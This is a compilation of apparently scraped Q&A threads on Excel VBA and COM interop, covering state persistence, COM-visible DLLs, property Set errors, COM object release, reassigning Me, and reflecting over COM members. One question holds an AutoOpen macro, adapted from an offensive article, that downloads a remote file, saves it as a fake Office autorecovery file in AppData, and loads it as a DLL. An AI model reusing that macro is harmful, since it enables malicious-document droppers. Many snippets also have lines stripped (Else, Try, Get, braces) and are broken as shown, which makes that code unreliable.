In Excel VBA how to persist key variables over a 'state loss' (without writing to a cell or a file)? - vba

Excel VBA is a flexible development environment. It is pesudo-compiled. However, sometimes during development a "state loss" can occur. A "state loss" is when all variables are torn down. Indeed, VBA has an option "Notify before state loss" option for triage. It is unsurprising that one cannot Edit and Continue code in all cases.
However, sometimes state losses happen whilst running in production because opening some other workbook may cause trauma to your application session (trust me, it happens!)
I know one can persist data to a worksheet cell or even a file but this is inappropriate for trying to retain an instance of a class, especially if that is the anchor for a whole object graph.
So in the case where one insists on a memory held variable how do you persist state over a state loss?

One way to keep the data persistent during the lifetime of Excel is to store them on the default .Net domain attached to the instance:
Sub Usage()
Dim dict As Object
Set dict = GetPersistentDictionary()
End Sub
Public Function GetPersistentDictionary() As Object
' References:
' mscorlib.dll
' Common Language Runtime Execution Engine
Const name = "weak-data"
Static dict As Object
If dict Is Nothing Then
Dim host As New mscoree.CorRuntimeHost
Dim domain As mscorlib.AppDomain
host.GetDefaultDomain domain
If IsObject(domain.GetData(name)) Then
Set dict = domain.GetData(name)
Set dict = CreateObject("Scripting.Dictionary")
domain.SetData name, dict
End If
End If
Set GetPersistentDictionary = dict
End Function

Attempting answer of my own question ...
The solution is to have a simple container, I choose Scripting.Dictionary, compiled into a DLL and make accessible to VBA using COM. In the old days one could have used VB6.
These days, one can also use C++ but here I present a C# solution (uses COM interop).
using System.Runtime.InteropServices;
namespace VBAStateLossProofStorageLib
// Code curated by S Meaden from Microsoft documentation
// 1. C# Shared Class library
// 2. In AssemblyInfo.cs set ComVisible(true)
// 3. In Project Properties->Build check 'Register for Interop'
// 4. Add Com reference to Microsoft Scripting Runtime
public interface IVBAStateLossProofStorage
Scripting.Dictionary getGlobalDictionary();
public class VBAStateLossProofStorage : IVBAStateLossProofStorage
public Scripting.Dictionary getGlobalDictionary()
{ return CVBAStateLossProofStorage.m_dictionary; }
// "a static class remains in memory for the lifetime of the application domain in which your program resides. "
static class CVBAStateLossProofStorage
public static Scripting.Dictionary m_dictionary;
static CVBAStateLossProofStorage()
m_dictionary = new Scripting.Dictionary();
And here is some client VBA code to demonstrate. Requires a Tools->Reference to the type library (.tlb file) created alongside the Dll.
Option Explicit
Public gdicLossy As New Scripting.Dictionary
Public gdicPermanent As Scripting.Dictionary
Sub RunFirst()
Set gdicLossy = New Scripting.Dictionary
gdicLossy.add "Greeting", "Hello world!"
Dim o As VBAStateLossProofStorageLib.VBAStateLossProofStorage
Set o = New VBAStateLossProofStorageLib.VBAStateLossProofStorage
Set gdicPermanent = o.getGlobalDictionary
gdicPermanent.RemoveAll '* clears it down
gdicPermanent.add "Greeting", "Bonjour!"
End Sub
Sub RunSecond()
Debug.Assert gdicLossy.Count = 0 '* sadly we have lost "Hello world!" forever
Dim o As VBAStateLossProofStorageLib.VBAStateLossProofStorage
Set o = New VBAStateLossProofStorageLib.VBAStateLossProofStorage
Set gdicPermanent = o.getGlobalDictionary
Debug.Assert gdicPermanent.Count = 1 '* Happily we have retained "Bonjour!" as it was safe in its compiled Dll
Debug.Assert gdicPermanent.Item("Greeting") = "Bonjour!"
End Sub


How to dynamically load a DLL in VBA using a DLL Trick

I'm reading this article:
and for some reason I can't seem to replicate the second Dll trick i.e Storing Seemingly "Legitimate" Office Files That Are Really DLLs.
What I've already tried is created a simple c# DLL with an exported function that only displays a Message-box saying ".NET Assembly Running".
The test.dll is run like so from the command line:
rundll32 test.dll,TestExport
But when I follow the article for some reason the code keeps failing.
Here's my modified VBA after following the article:
Private Declare Sub TestExport Lib "Autorecovery save of Doc3.asd" ()
Sub AutoOpen()
Dim PathOfFile As String
PathOfFile = Environ("AppData") & "\Microsoft\Word"
VBA.ChDir PathOfFile
Dim remoteFile As String
Dim HTTPReq As Object
remoteFile = ""
storein = "Autorecovery save of Doc3.asd"
Set HTTPReq = CreateObject("Microsoft.XMLHTTP")
HTTPReq.Open "GET", remoteFile, False
If HTTPReq.Status = 200 Then
Set output = CreateObject("ADODB.Stream")
output.Type = 1
output.Write HTTPReq.responseBody
output.SaveToFile storein, 2
End If
End Sub
Sub Invoke()
End Sub
And here's the C# code for the DLL:
using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Test
class Test
public static void TestExport()
MessageBox.Show(".NET Assembly Running");
I expected it to work just don't know why it didn't fit my VBA.
It does not work like that in VBA. The DLL has to be a COM DLL and to be loaded by the VBA project reference. That also means that the DLL has to be registered in the Windows registry. So put your C# away and start VB.NET. Create a dll project and choose a COM-CLASS from the Templates.
Look at the first line here (
<Assembly: CommandClass(GetType(ComClass3))> '<<<<add this !!!!
<ComClass(ComClass3.ClassId, ComClass3.InterfaceId, ComClass3.EventsId)>
Public Class ComClass3
#Region "COM-GUIDs"
Public Const ClassId As String = "94b64220-ce6e-400d-bcc0-d45ba56a14f7"
Public Const InterfaceId As String = "89a8c04e-e1fb-4950-85b2-7c1475156701"
Public Const EventsId As String = "af56d401-6492-4172-bf1e-10fa5e419aa4"
#End Region
Public Sub New()
End Sub
sub test
'your code
end sub
End Class
The fun part is that by the assembly advice all your subs and functions show up in VBA without any other action.
TO GET THIS WORK START VS IN ADMINISTRATOR MODE !!! Otherwise it has not the needed rights to also automatically do the dll registering.
If you are happy use some tool to convert the code to c#. Its also possible just to do the interface as a wrapper in :) Now you can reference the dll in VBA and do all the things with her like you can do with other dlls which work in VBA. Like:
SUB tester
dim x= new comclass3
end sub
Some pitfalls i forget to mention. VBA and .NET do not speak all the time the same string language. Stupidly one way is converted automatically - the way back not. One talks for example in UTF8 an the other in BSTR. So if nothing or garbage is returned most likely you has not chosen the wrong string converter. I use the auto detect converter from .net if needed. You can get crazy by this. Also do not mix 32bit and 64 bit code or pointers. Autocad for example will nuke up immediatly by this. (Whatever genius drawing you might have inside - it doesnt cares).

Getting a collection property of a class take a property of another class of another type?

I wanted to first thank you all for the help you've given me implicitly over the last few months! I've gone from not knowing how to access the VBA IDE in Excel to writing fully integrated analysis programs for work. I couldn't have done it without the community here.
I'm currently trying to overhaul the first iteration of a data analysis program I wrote while learning how to code in VBA. While purpose driven and only really legible to myself, the code worked; but was a mess. From folks on this site I picked up Martin's Clean Code and gave it a read on how to try and be a better programmer.
From Martin's Clean Code, it was impressed on me to prioritize abstraction and decoupling of my code to allow for higher degrees of maintenance and modularization. I found this out the hard way since very minor changes requested above my pay grade would require massive and confusing rewrites! I'm trying to eliminate that problem going forward.
I am attempting to rewrite my code in terms of single responsibility classes (at least, where it is possible) and I am a bit confused. I apologize if my question isn't clear or if I'm using the wrong terminology. I want to be able to generate a collection of specific strings (the names of our detectors to be specific) with no duplicates from raw instrument data files from my lab. The purpose of this function is to assemble a bunch of metadata in a class and use it to standardize our file system and prevent clerical errors from newbies and old hands when they use the analysis program.
The testing initialization sub is below. It pops open a userform asking for the user to select the filepaths of the three files in the rawdatafiles class; then it kills the userform to free memory. The metadata object is currently for testing and will be rewritten properly when I get the output I want:
Sub setup()
Set rawdatafiles = New cRawDataFiles
rawdatafiles.labjobFile = GrabFiles.tboxLabJobFile.value
rawdatafiles.rawdatafirstcount = GrabFiles.tboxOriginal.value
rawdatafiles.rawdatasecondcount = GrabFiles.tboxRecount.value
Set GrabFiles = Nothing
Dim temp As cMetaData
Set temp = New cMetaData
temp.labjobName = rawdatafiles.labjobFile
'this works fine!
temp.detectorsOriginal = rawdatafiles.rawdatafirstcount
' This throws run time error 424: Object Required
End Sub
The cMetadata class I have currently is as follows:
Private pLabjobName As String
Private pDetectorsOriginal As Collection
Private pDetectorsRecheck As Collection
Private Sub class_initialize()
Set pDetectorsOriginal = New Collection
Set pDetectorsRecheck = New Collection
End Sub
Public Property Get labjobName() As String
labjobName = pLabjobName
End Property
Public Property Let labjobName(fileName As String)
Dim FSO As New FileSystemObject
pLabjobName = FSO.GetBaseName(fileName)
Set FSO = Nothing
End Property
Public Property Get detectorsOriginal() As Collection
detectorsOriginal = pDetectorsOriginal
End Property
Public Property Set detectorsOriginal(originalFilepath As Collection)
pDetectorsOriginal = getDetectors(rawdatafiles.rawdatafirstcount)
End Property
When I step through the code it starts reading the "public property get rawdatafirstcount() as string" and throws the error after "End Property" and points back to the "temp.detectorsOriginal = rawdatafiles.rawdatafirstcount" line in the initialization sub.
I think I'm at least close because the temp.labjobName = rawdatafiles.labjobFile code executes properly. I've tried playing around with the data types since this is a collection being assigned by a string but I unsurprisingly get data type errors and can't seem to figure out how to proceed.
If everything worked the way I want it to, the following function would take the filepath string from the rawdatafiles.rawdatafirstcount property and return for me a collection containing detector names as strings with no duplicates (I don't know if this function works exactly the way I want since I haven't been able to get the filepath I want to parse properly in the initial sub; but I can deal that later!):
Function getDetectors(filePath As String) As Collection
Dim i As Integer
Dim detectorsCollection As Collection
Dim OriginalRawData As Workbook
Set OriginalRawData = Workbooks.Open(fileName:=filePath, ReadOnly:=True)
Set detectorsCollection = New Collection
For i = 1 To OriginalRawData.Worksheets(1).Range("D" & Rows.Count).End(xlUp).Row
detectorsCollection.Add OriginalRawData.Worksheets(1).Cells(i, 4).value, CStr(OriginalRawData.Worksheets(1).Cells(i, 4).value)
On Error GoTo 0
Next i
getDetectors = detectorsCollection
Set detectorsCollection = Nothing
Set OriginalRawData = Nothing
End Function
Thanks again for reading and any help you can offer!
temp.detectorsOriginal = rawdatafiles.rawdatafirstcount
' This throws run time error 424: Object Required
It throws an error because, as others have already stated, the Set keyword is missing.
Now with that out of the way, a Set keyword is NOT what you want here. In fact, sticking a Set keyword in front of that assignment will only buy you another error.
Let's look at this property you're invoking:
Public Property Get detectorsOriginal() As Collection
detectorsOriginal = pDetectorsOriginal
End Property
Public Property Set detectorsOriginal(originalFilepath As Collection)
pDetectorsOriginal = getDetectors(rawdatafiles.rawdatafirstcount)
End Property
You're trying to assign detectorsOriginal with what appears to be some String value that lives in some TextBox control on that form you're showing - but the property's type is Collection, which is an object type - and that's not a String!
Now look at the property that does work:
Public Property Get labjobName() As String
labjobName = pLabjobName
End Property
Public Property Let labjobName(fileName As String)
Dim FSO As New FileSystemObject
pLabjobName = FSO.GetBaseName(fileName)
Set FSO = Nothing
End Property
This one is a String property, with a Property Let mutator that uses the fileName parameter it's given.
The broken one:
Public Property Set detectorsOriginal(originalFilepath As Collection)
pDetectorsOriginal = getDetectors(rawdatafiles.rawdatafirstcount)
End Property
Is a Set mutator, takes a Collection parameter, and doesn't use the originalFilepath parameter it's given at all!
And this is where I'm confused about your intention: you're passing what has all the looks of a String except for its type (Collection) - the calling code wants to give it a String.
In other words the calling code is expecting this:
Public Property Let detectorsOriginal(ByVal originalFilepath As String)
See, I don't know what you meant to be doing here; it appears you're missing some pOriginalFilepath As String private field, and then detectorsOriginal would be some get-only property that returns some collection:
Private pOriginalFilePath As String
Public Property Get OriginalFilePath() As String
OriginalFilePath = pOriginalFilePath
End Property
Public Property Let OriginalFilePath(ByVal value As String)
pOriginalFilePath = value
End Property
I don't know what you're trying to achieve, but I can tell you this:
Don't make a Property Set member that ignores its parameter, it's terribly confusing code.
Don't make a Property (Get/Let/Set) member that does anything non-trivial. If it's not trivially simple and has a greater-than-zero chance of throwing an error, it probably shouldn't be a property. Make it a method (Sub, or Function if it needs to return a value) instead.
A word about this:
Dim FSO As New FileSystemObject
pLabjobName = FSO.GetBaseName(fileName)
Set FSO = Nothing
Whenever you Dim something As New, VBA will automatically instantiate the object whenever it's referred to. In other words, this wouldn't throw any errors:
Dim FSO As New FileSystemObject
Set FSO = Nothing
pLabjobName = FSO.GetBaseName(fileName)
Avoid As New if you can. In this case you don't even need a local variable - use a With block instead:
With New FileSystemObject
pLabjobName = .GetBaseName(fileName)
End With
May not be your issue but you're missing Set in your detectorsOriginal Set/Get methods:
Public Property Get detectorsOriginal() As Collection
Set detectorsOriginal = pDetectorsOriginal
End Property
Public Property Set detectorsOriginal(originalFilepath As Collection)
Set pDetectorsOriginal = getDetectors(rawdatafiles.rawdatafirstcount)
End Property
So the error is one I've made a time or two (or more). Whenever you assign an object to another object, you have to use the Set reserved word to assign the reference to the Object.
In your code do the following:
In Sub setup()
Set temp.detectorsOriginal = rawdatafiles.rawdatafirstcount
And in the cMetadata class change the Public Property Set detectorsOriginal(originalFilepath As Collection) property to the following:
Public Property Get detectorsOriginal() As Collection
Set detectorsOriginal = pDetectorsOriginal
End Property
Public Property Set detectorsOriginal(originalFilepath As Collection)
Set pDetectorsOriginal = getDetectors(rawdatafiles.rawdatafirstcount)
End Property
Also in your function Function getDetectors(filePath as String) as Collection change the statement afterNext i` to
Set getDetectors = detectorsCollection
Also, I'm very glad to hear that you've learned how to use VBA.
When you're ready to create your own Custom Collections, check out this post. Your own custom Collections.
I also book marked Paul Kelly's Excel Macro Mastery VBA Class Modules – The Ultimate Guide as well as his Excel VBA Dictionary – A Complete Guide.
If you haven't been to Chip Pearson's site you should do so. He has a ton of useful code that will help your delivery your projects more quickly.
Happy Coding.

Proper release of COM objects in code

I have just started to migrate some code from VBA to VB.Net. So I am an absolute beginner in VB.Net – but I want to do things right. Maybe some of my questions are stupid but I guess that is because I am a beginner.
So as a first exercise I have developed my first piece of code (see below). Now I thought I have to release ALL COM objects again. Two of them throw errors already while writing the code. And others throw errors at runtime.
But the funny thing is: Weather I release the rest of the COM objects or not (by making the relevant not yet commented lines of Marshal.Release to comments as well – then all lines starting with Marshal.Release are comment lines) the behavior of the code is absolutely the same to my eyes.
Can anybody tell me where I can see/find the difference?
The internet tells me that there must be a difference?
But I guess I just don’t understand (till now).
Besides this many more questions are in my head:
Does every “Dim” statement create a COM Object - that has to be released later on?
If not how do I detect whether a COM object has been created or not? Which “Dim” statements create COM object and which don't?
In this example: Dim ActiveWindow As Object = Nothing Try ActiveWindow = Me.HostApplication.ActiveWindow() Catch End Try
identical to
According to this:
Would it not be better to release each "level" separately like this:
Overall: Am I trying to release too much? Or is it correct / good practie?
And what does "GC.Collect()" and "… = Null" have to do with all this? I have not used it at all. Should I better use it? Why? ( "... = Null" I have seen here:
Why do I get “ShapeCount was not declared …” - Error if I try to do “Marshal.ReleaseComObject(ShapeCount)”? The same with “ShRange”. I think these are COM objects as well?!?
How do I notice when is the best time to release the COM object again? When I process/debug my code step by step with F11 will it be possible for me to determine the best (soonest) point of release? So far I have no “feeling” about when the COM object is not needed anymore and I can release it.
Any help and explanations very welcome.
Here is the code I am talking about:
Imports System.Runtime.InteropServices
Imports System.ComponentModel
Imports System.Windows.Forms
Imports AddinExpress.MSO
Imports PowerPoint = Microsoft.Office.Interop.PowerPoint
'Add-in Express Add-in Module
ProgIdAttribute("MyAddin8.AddinModule")> _
Public Class AddinModule
Inherits AddinExpress.MSO.ADXAddinModule
#Region " Add-in Express automatic code "
#End Region
Public Shared Shadows ReadOnly Property CurrentInstance() As AddinModule
Return CType(AddinExpress.MSO.ADXAddinModule.CurrentInstance, AddinModule)
End Get
End Property
Public ReadOnly Property PowerPointApp() As PowerPoint._Application
Return CType(HostApplication, PowerPoint._Application)
End Get
End Property
Private Sub AdxRibbonButton2_OnClick(sender As Object, control As IRibbonControl, pressed As Boolean) Handles AdxRibbonButton2.OnClick
End Sub
Friend Function GetInfoString2() As String
Dim ActiveWindow As Object = Nothing
ActiveWindow = Me.HostApplication.ActiveWindow()
End Try
Dim Result As String = "No document window found!"
If Not ActiveWindow Is Nothing Then
Select Case Me.HostType
Case ADXOfficeHostApp.ohaPowerPoint
Dim Selection As PowerPoint.Selection =
CType(ActiveWindow, PowerPoint.DocumentWindow).Selection
Dim WindowViewType As PowerPoint.PpViewType = PowerPoint.PpViewType.ppViewNormal
Dim SlideRange As PowerPoint.SlideRange = Selection.SlideRange
Dim SlideCountString = SlideRange.Count.ToString()
If WindowViewType = 9 And SlideCountString < 2 Then
Dim ShRange As PowerPoint.ShapeRange = Nothing
ShRange = Selection.ShapeRange
End Try
If Not ShRange Is Nothing Then
Dim ShapeCount = ShRange.Count.ToString()
Result = "You have " + ShapeCount _
+ " shapes selected."
Result = "You have 0 shapes selected."
End If
End If
Case Else
Result = AddinName + " doesn't support " + HostName
End Select
End If
Return Result
End Function
End Class
The ReleaseComObject method of the Marshal class decrements the reference count of the specified Runtime Callable Wrapper (RCW) associated with the specified COM object, it doesn't release an object. It comes from the COM nature.
Typically you need to release every object returned from the Office (PowerPoint in your case) object model. Exceptions are objects passed to event handlers as parameters.
You may read more about that and find answers to your multiple questions in the When to release COM objects in Office add-ins developed in .NET article.
FinalReleaseComObject calls ReleaseComObject til it returns 0 which means release of COM object. Calling them in reverse order as in Excel objects(Application, Workbook, Worksheet) is the proper way to dispose of COM objects that are related.
Exception Condition
o is not a valid COM object.
o is null.

How to set current object (Me) to a new object stored in an array in Visual Basic for Excel

I have an array of objects in an excel vba project. I have created another instance of the same class and set 1 of its properties. I am then trying to search through the array of objects to find the object in the array that matches the current one on the same property. I would like to set the current object to the one in the array inside one of the current object's methods using the self reference Me.
I tried:
Set Me = objectArray(index)
This does not work. It says that this is an improper use of the Me keyword. Is there a way to set the current object to another object of the same type? Thanks!
I have an object that has child objects:
Here, shiftType is the object of type CVocabulary, which is my self defined class. It has a sub called loadFromArray that looks like this:
Public Sub loadFromArray()
Dim index As Integer
index = searchVocabArray(Me.typed)
If (index = -1) Then
Exit Sub
End If
Set Me = vocabArray(index)
End Sub
vocabArray() is a global array containing CVocabulary objects.
If it is not possible to Set an object from within itself, I can try something else. This is just the easiest and most direct way of doing this. I'm sure I can just set each parameter from the current object to the value of the parameter from the object in the array, but if it was possible to do something like the above, that would have been my preferred method.
You can do it by giving itself to the function as a parameter. I'll show it in VBScript because the classes are more clear, but the concept is the same as in VBA:
public myObject
set myObject = new x
myObject.ChangeMe MyObject
msgbox typename(myObject) ' <- outputs 'y'
class x
public sub changeMe(byref object)
set object = new y
end sub
end class
class y
' just an empty class
end class
But this is not a good programming pattern and could cause messy code (maintenance and debugging would be an issue) and even memory leaks. You should create an (Abstract) Factory, Builder or Provider that returns an object as you ask for it.
Factory: creates a new predefined object
Builder: creates a new object that is configured in the builder
Provider: returns an existing object that is predefined earlier
I don't beleive you can use Me in this context - you are trying to use Me as it was used in VB6 (which was equivalent to 'this' in C#). This is not appropriate in VBA.
Without some code snippets its hard to see what you are doing. Can you perform the search in a module and create instances of this class there? You can then do:
Set class2 = objectArrayofClass1(index)
As you've already seen that Me cannot be changed. You can handle memorized objects through
a function in a public Module like basExternal:
Public Function loadFromArrayByIndex(ByVal lIndex)
dim xobj as Object
Set xobj = vocabArray(lIndex)
' do modifications and handling on this object:
' ...
End Function

Can VBA enumerate a COM object's methods or fields?

I have a COM object (built with C#.NET) I'm using in VBA (Excel) and it would be really nice enumerate the COM object's fields and reference them automatically. In .NET, this could be done with reflection. Is there any way to do this in VBA?
So, instead of
Dim x As MyCOMObject
Set x = New MyCOMObject
x.f1 = 1
x.f2 = 2
x.f3 = 3
Something more like:
Dim x As MyCOMObject
Set x = New MyCOMObject
For i = 0 to COMFieldCount(x) - 1
SetCOMField(x, GetCOMFieldName(i), i+1)
Next i
You will probably need to refine this code a bit, but it does roughly what you are looking for.
First, you need to add reference to "Typelib information", TLBINF32.dll. I'm not sure if this is a part of Windows or came with some of the numerous SDKs I have installed on my machine, but it is in the System32 folder.
I am assuming that you are setting properties of a COM object, so you will be calling "property put" functions to set the values of your object. You may need to check for the datatypes of those properties, I haven't done any datatype conversion in my code.
The code looks like this:
'Define the variables
Dim tliApp As TLI.TLIApplication
Dim typeinfo As TLI.typeinfo
Dim interface As TLI.InterfaceInfo
Dim member As TLI.MemberInfo
'Initialize typelib reflector
Set tliApp = New TLI.TLIApplication
'Get the type information about myObject (the COM object you want to process)
Set typeinfo = tliApp.ClassInfoFromObject(myObject)
'Set all properties of all the object's interfaces
For Each interface In typeinfo.Interfaces
For Each member In interface.Members
'If this is a "property put" function
If member.InvokeKind = INVOKE_PROPERTYPUT Then
'Invoke the mebmer and set someValue to it.
'Note that you'll probably want to check what datatype to use and do some more error checking
CallByName myObject, member.Name, VbLet, someValue
End If